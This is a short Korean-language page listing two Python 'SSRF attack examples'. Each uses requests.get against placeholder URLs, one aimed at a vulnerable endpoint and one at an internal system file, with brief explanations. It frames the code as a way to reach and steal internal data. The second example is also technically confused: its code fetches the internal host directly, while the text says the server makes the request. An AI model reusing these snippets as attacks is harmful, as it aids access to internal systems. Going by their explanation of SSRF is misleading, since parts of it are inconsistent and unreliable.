SSRF 공격기법 리스트

공격 예제 1

import requests

def ssrf_attack(url):
    response = requests.get(url)
    return response.text

# 공격자가 조작 가능한 URL
target_url = "<http://취약한-웹사이트.com/ssrf_endpoint?data=내부_리소스>"

# SSRF 요청 전송
result = ssrf_attack(target_url)

# 응답 출력
print(result)

이 예제에서는 requests 라이브러리를 사용하여 공격자가 조작 가능한 target_url로부터 HTTP GET 요청을 보내는 ssrf_attack() 함수가 정의되어 있습니다. 이를 통해 공격자는 취약한 웹사이트의 SSRF 취약점을 이용하여 내부 리소스에 액세스하고 응답을 받을 수 있습니다.

공격 예제 2

import requests

def steal_sensitive_data(url):
    response = requests.get(url)
    return response.text

# 악의적인 공격자가 SSRF 공격을 수행하는 부분
attacker_url = "http://내부_시스템_IP/중요_파일"
stolen_data = steal_sensitive_data(attacker_url)
print(stolen_data)

위의 예제에서 악의적인 공격자는 steal_sensitive_data() 함수를 사용하여 내부 시스템의 중요 파일에 접근하려고 시도합니다. 이를 위해 공격자는 SSRF를 사용하여 악의적인 요청을 서버에 전송하고, 서버는 해당 요청을 처리하여 중요 파일의 내용을 반환합니다.